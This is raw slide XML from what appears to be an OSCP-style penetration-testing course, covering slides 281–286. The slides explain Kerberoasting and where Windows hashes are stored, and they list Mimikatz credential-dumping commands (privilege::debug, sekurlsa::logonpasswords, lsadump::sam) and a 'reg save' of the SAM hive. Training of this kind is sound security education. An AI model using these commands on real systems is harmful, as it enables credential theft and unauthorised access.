        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6587B8AD-54E4-46D8-A0E8-C1FFC67FEC14}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>New Term: SPN (Service Principal Name)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Maps a service instance to a service logon account, like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>iis_svc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example: HTTP/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>iis.playground.lab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> maps to the IIS Service Account</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Recall from the Kerberos process: TGSs are encrypted with the service </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>NTHash</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If we can capture a ticket, we can crack it offline to get the password</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Any valid account with a TGT can request TGSs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Easy Mode: Invoke-Kerberoast.ps1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Will find all </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>viable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> SPNs in an environment</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35884097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13DBC-0A9D-4601-BF9A-EAAFECD7C17B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BECF63ED-5365-0347-943C-46237B9951C9}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>281</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D951AD1D-DECC-4698-A9C1-E3E8161FCA12}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{01D62816-54E4-4F45-8970-3F8064F2AE06}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2205037" y="914400"/>
            <a:ext cx="7953375" cy="1524000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6BD090A-7073-4B6D-BD83-0206D44A61DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1704975" y="2652712"/>
            <a:ext cx="8782050" cy="2009775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80D8E398-0512-4A62-8BB0-084CDE23E0C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426720" y="4573582"/>
            <a:ext cx="11338560" cy="1759099"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Notes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If this account allows interactive logons, we can do that</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Other way: silver ticket – explained in a bit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15747328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91F18-5B58-478D-B301-073D929E5364}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BECF63ED-5365-0347-943C-46237B9951C9}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>282</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Title 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DDB805AE-6FA8-431E-91F7-A0387B64DA10}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Gathering Hashes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33151770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190F7-4A72-4E4C-B413-A6FDEC6FB760}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BECF63ED-5365-0347-943C-46237B9951C9}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>283</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Title 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6C1DA18-8B64-4FC4-8B56-1C161052F3C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>All Hail the Hash</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C37E743-9371-4AC8-BCCE-BCD7076E745A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>As you may have noticed, hashes are almost as valuable as passwords</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Stored in a few places:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Local Security Authority Subsystem Service (LSASS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HKLM\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and HKLM\system (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>reg save</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>NTDS.dit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> database (DC only)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Our focus: LSASS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Requires SYSTEM privileges (at least Local Admin)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Enter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Mimikatz</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="Mimikatz - ifconfig.dk">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A64AAF2-2927-4EA6-A716-6C6913A0D2E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889" b="91556" l="9778" r="89778">
                        <a14:foregroundMark x1="49333" y1="89333" x2="49333" y2="89333"/>
                        <a14:foregroundMark x1="90222" y1="48444" x2="90222" y2="48444"/>
                        <a14:foregroundMark x1="56889" y1="9333" x2="56889" y2="9333"/>
                        <a14:foregroundMark x1="45333" y1="91556" x2="45333" y2="91556"/>
                      </a14:backgroundRemoval>
                    </a14:imgEffect>
                  </a14:imgLayer>
                </a14:imgProps>
              </a:ext>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8568247" y="2271712"/>
            <a:ext cx="3290888" cy="329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179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359F9-8302-4604-A77E-22A49BA6D358}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BECF63ED-5365-0347-943C-46237B9951C9}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>284</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{50B7A448-828F-47B7-8567-B77AFC2B43A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Mimikatz</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6EE7E4D-BA36-421F-9A90-FF885EA3C9A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Very popular (and very detectable) tool to play with credentials</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Don’t worry about detection for OSCP – the binary will be just fine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Most functions require a local administrator account</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can be elevated to SYSTEM by using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>privilege::debug</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Common commands for gathering credentials</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sekurlsa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logonpasswords</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(logged on/recently logged on hashes)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sekurlsa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>::tickets </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(any TGTs/TGSs stored on the system)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>lsadump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sam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(Security Account Manager – local credentials)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34064285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0FF970-59F1-4116-BA7B-14BF7D67E0C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BECF63ED-5365-0347-943C-46237B9951C9}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>285</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BEF007EF-E85D-4A36-BE68-102BAE09C875}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Examples – logon passwords</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C019293-1B13-42DE-94AC-740A977D74B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2664240" y="1261745"/>
            <a:ext cx="8087854" cy="4544059"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx2"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C230E8A-F5A1-4C9D-A374-217B8E948E6A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3819525" y="5057775"/>
            <a:ext cx="5114925"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08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0FF970-59F1-4116-BA7B-14BF7D67E0C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BECF63ED-5365-0347-943C-46237B9951C9}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>286</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BEF007EF-E85D-4A36-BE68-102BAE09C875}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Examples – logon passwords – Sometimes you get lucky</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="Group 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7D27CDB-E5D4-4E67-922D-EC19A419FF1A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4659405" y="1065160"/>
            <a:ext cx="6779070" cy="5276320"/>
            <a:chOff x="2958877" y="1065160"/>
            <a:chExt cx="6779070" cy="5276320"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="8" name="Picture 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{59B98B5C-BED7-4D87-A92E-9E1418002865}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="2958877" y="1065160"/>
              <a:ext cx="6779070" cy="5276320"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="38100">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="Rectangle 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C230E8A-F5A1-4C9D-A374-217B8E948E6A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3886201" y="6017630"/>
              <a:ext cx="220980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39147668-80A3-45C8-87D0-DEF653E8CB22}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="302895" y="2823770"/>
